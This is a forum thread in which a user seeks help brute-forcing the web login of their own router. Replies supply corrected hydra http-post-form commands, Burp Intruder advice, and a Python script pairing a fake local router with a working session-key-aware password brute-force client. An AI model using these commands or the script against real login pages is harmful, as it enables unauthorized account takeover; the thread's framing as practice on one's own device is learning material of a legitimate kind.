Posted

Hello,

I'm trying to hack into my router (not doing anything nefarious).
Can I get some help with the '/login.cgi' part?

hydra 192.168.1.254 http-form-post "/login.cgi:sessionKey=177691457&inputUserName=^USER^&inputPassword=^PASS^:err" -L admin -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt

I'm guessing that in the current state, even if hydra were to get the password correct, it would still respond with "msg=err", because I need to have a proper session key.
Also, any idea what "nothankyou=1" is? Do I need to have that in the command?
Is there, like, a cookie file I have to use to generate session keys?

Also, ":err" is like "if the response is not 'err', then that was a correct password". Is this piece correct? The browser returns "http://192.168.1.254/index.html?msg=err".
Should it be ":msg=err"?

Thanks for your help.


POST http://192.168.1.254:80/login.cgi HTTP/1.1
Host: 192.168.1.254
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.254/
Cookie: Telus=T1200H-31.128L.07
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-length: 68

sessionKey=1286954970&inputUserName=as&inputPassword=fd&nothankyou=1


Posted

For brute forcing web applications I recommend using Burp Suite. You would simply capture an attempt to log in with any password (like the one you've already shared), then right-click on the POST and send it to the Intruder tab. Highlight the password field and then import your password list as the payload injections.

Since this is your router, I'm assuming you already know the password and are simply trying this as an exercise. You could log in with the correct password and use Burp to tell you what a correct response looks like. Then you can tailor your Intruder advanced options to check specifically for the correct response.

Hope that helps.

Posted (edited)

Hydra works fine, and I use it all the time, but look at your syntax: I think you have http-form-post wrong. You should try "http-post-form", like so:

hydra -l admin -P pass.txt 192.168.1.254 http-post-form "/login.cgi:sessionKey=177691457&inputUserName=^USER^&inputPassword=^PASS^:F=err:" -o hydra-http-post-attack.txt

If your router uses https, change it to "https-post-form".

Also, if you are specifying the user, use lowercase -l, not capital; capital -L is for a wordlist of user names. You can in most cases omit the session key, but if it uses specific hard-coded cookies you should try to pass the cookie using the :H cookie='cookieinfo':

Edited by digip
Posted
On 10/5/2016 at 9:17 AM, pentestgeek said:

For brute forcing web applications I recommend using Burp Suite.  You would simply capture an attempt to login with any password (like the one you've already shared), then right click on the POST and send it to the Intruder tab.  Highlight the password field and then import your password list as the payload injections.

Since this is your Router I'm assuming you already know the password and are simply trying this as an exercise.  You could log in with the correct password and use Burp to tell you what a correct response looks like.  Then you can tailor your Intruder advanced options to check specifically for the correct response.

Hope that helps.

Again, since this is in fact your router, as you say, and you know the password, you can find out whether sessionKey is required or not. Simply replay the POST with only the "inputUserName" and "inputPassword" parameters and see if you get a successful response.
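An added example, not code from anyone in this thread and not hydra itself: a stdlib-only Python script that stands in for the router's /login.cgi (a constructed fake with made-up credentials, so it runs offline) plus a client that does what a hard-coded sessionKey on the hydra command line cannot, namely fetch a fresh key before every guess, post the captured field names, and decide success by whether the Location header carries "msg=err" rather than a bare "err". It also shows, in a slightly different form, the check suggested in the post above: a stale key with the right password still lands on msg=err, so the key matters on this fake. Only the parameter names (sessionKey, inputUserName, inputPassword, nothankyou) and the index.html?msg=err redirect come from the captured request earlier in the thread; the one-shot key behaviour, the wordlist and the credentials are assumptions for the demo.

```python
"""Fake router login plus a session-aware brute force (added example, stdlib only)."""
import re
import secrets
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed for the example; NOT the real router's credentials or wordlist.
FAKE_USER = "admin"
FAKE_PASS = "correcthorse"
CONSTRUCTED_WORDLIST = ["123456", "password", "admin", "correcthorse", "letmein"]


class FakeRouter(BaseHTTPRequestHandler):
    """Stand-in for the router: GET / hands out a one-shot sessionKey in the
    login form; POST /login.cgi accepts only a key it issued plus the right
    credentials, then redirects to /index.html (ok) or /index.html?msg=err.
    One-shot keys are an assumption to make the 'stale key' case visible."""
    issued_keys = set()

    def log_message(self, *args):
        pass  # keep the demo quiet

    def do_GET(self):
        key = str(secrets.randbelow(2**31))
        FakeRouter.issued_keys.add(key)
        body = ('<form method="post" action="/login.cgi">'
                f'<input type="hidden" name="sessionKey" value="{key}">'
                '<input name="inputUserName"><input name="inputPassword">'
                '</form>').encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        key = form.get("sessionKey", [""])[0]
        valid_key = key in FakeRouter.issued_keys
        FakeRouter.issued_keys.discard(key)  # one-shot: a replayed key fails
        ok = (valid_key
              and form.get("inputUserName", [""])[0] == FAKE_USER
              and form.get("inputPassword", [""])[0] == FAKE_PASS)
        self.send_response(302)
        self.send_header("Location", "/index.html" if ok else "/index.html?msg=err")
        self.end_headers()


class _KeepRedirect(urllib.request.HTTPRedirectHandler):
    """Hand back the 3xx response instead of following it, so the caller can
    read the Location header; that is where msg=err shows up."""
    def http_error_302(self, req, fp, code, msg, headers):
        return fp
    http_error_301 = http_error_303 = http_error_307 = http_error_302


def fetch_session_key(base_url):
    """Load the login page and pull the current sessionKey out of the form."""
    html = urllib.request.urlopen(base_url + "/").read().decode()
    match = re.search(r'name="sessionKey"\s+value="(\d+)"', html)
    if not match:
        raise RuntimeError("login page has no sessionKey field")
    return match.group(1)


def attempt_login(base_url, user, password, session_key):
    """One POST to /login.cgi with the captured field names. Success means
    'not bounced to msg=err'; matching the whole token avoids false hits on
    a bare 'err' that might appear elsewhere in a response."""
    data = urllib.parse.urlencode({
        "sessionKey": session_key,
        "inputUserName": user,
        "inputPassword": password,
        "nothankyou": "1",  # the browser sent it; replay it unchanged
    }).encode()
    opener = urllib.request.build_opener(_KeepRedirect)
    request = urllib.request.Request(base_url + "/login.cgi", data=data)
    with opener.open(request) as resp:
        return "msg=err" not in resp.headers.get("Location", "")


def brute_force(base_url, user, wordlist):
    """Fresh sessionKey before every guess; returns the working password or None."""
    for candidate in wordlist:
        if attempt_login(base_url, user, candidate, fetch_session_key(base_url)):
            return candidate
    return None


def start_fake_router():
    """Start the stand-in on a random loopback port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), FakeRouter)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def run_demo():
    """Run the cases the thread argues about against the fake and return them."""
    server, base = start_fake_router()
    try:
        stale_key = attempt_login(base, FAKE_USER, FAKE_PASS, "177691457")  # key from the OP's command
        fresh_key = fetch_session_key(base)
        first_use = attempt_login(base, FAKE_USER, FAKE_PASS, fresh_key)
        replayed = attempt_login(base, FAKE_USER, FAKE_PASS, fresh_key)
        found = brute_force(base, FAKE_USER, CONSTRUCTED_WORDLIST)
    finally:
        server.shutdown()
    return {"stale_key": stale_key, "first_use": first_use, "replayed": replayed, "found": found}


if __name__ == "__main__":
    print(run_demo())
```

Against a real device the same loop applies, with the regex adjusted to however that firmware embeds the key; if replaying the POST with the key omitted still gets you in, the key is decorative and the plain hydra line in this thread is enough.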

Posted
11 hours ago, kdodge said:

is thc open source?

hydra is the tool name in Kali, really; although thc-hydra is its full name, you invoke it with hydra.

It is open source.

Home page: https://www.thc.org/thc-hydra/

Git page: https://github.com/vanhauser-thc/thc-hydra
